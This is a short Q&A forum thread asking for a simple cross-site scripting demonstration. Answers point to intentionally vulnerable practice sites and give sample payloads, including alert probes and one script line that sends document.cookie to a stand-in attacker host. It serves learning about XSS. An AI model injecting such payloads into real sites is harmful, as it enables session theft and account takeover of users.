# A simple example of a Cross-site scripting attack

Tags: xss

Can someone show me a [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting) attack in effect on my browser? Is there an example on the internet that does this? I haven't found this on the internet.

The simpler the example is the better.

Answer (score 33, accepted):

See http://www.insecurelabs.org and http://www.insecurelabs.org/task/

Intentionally vulnerable to XSS in the search field and several other places.

Comment: Type <script>alert(2)</script> in search and it alerts me

Comment: Yes, but the point isn't to reveal all the bugs here. And there are certainly more than that.

Answer (score 8):

`<img src="javascript:alert('hello everybody')"></img>`
The image tag that I inserted is a example of xss. the above src contains the java script alerting you.

Comment: This doesn't do anything!?

Answer (score 7):

You'll generally have to install your own server-side software for a live XSS example. Not many legitimate sites will open an XSS flaw intentionally to web surfers.

One ready-made piece of server-side software that lets you demonstrate XSS (among many other things) to yourself is OWASP's WebGoat. Here are [instructions to install WebGoat and demonstrate XSS](http://www.securitydistro.com/security-tutorials/OWASP-Introduction-to-XSS-using-WebGoat). You will find additional examples of program snippets that enable XSS in the OWASP article "[Cross-site scripting (XSS)](https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29)".

Answer (score 6):

Simple Form would also be:
If the message box will show up, you know, that the page or the server is vulnerable.

```
  <script>window.location = 'haxxed.com? cookie=' + document.cookie</script>
```

A great sample of how the technique works can be found here
https://www.hacksplaining.com/exercises/xss-stored

Comment: Found this blog useful https://lurninghut.com/xss-cross-site-scripting-java-demo.html, it has Java example of spinning up servers and victim environment.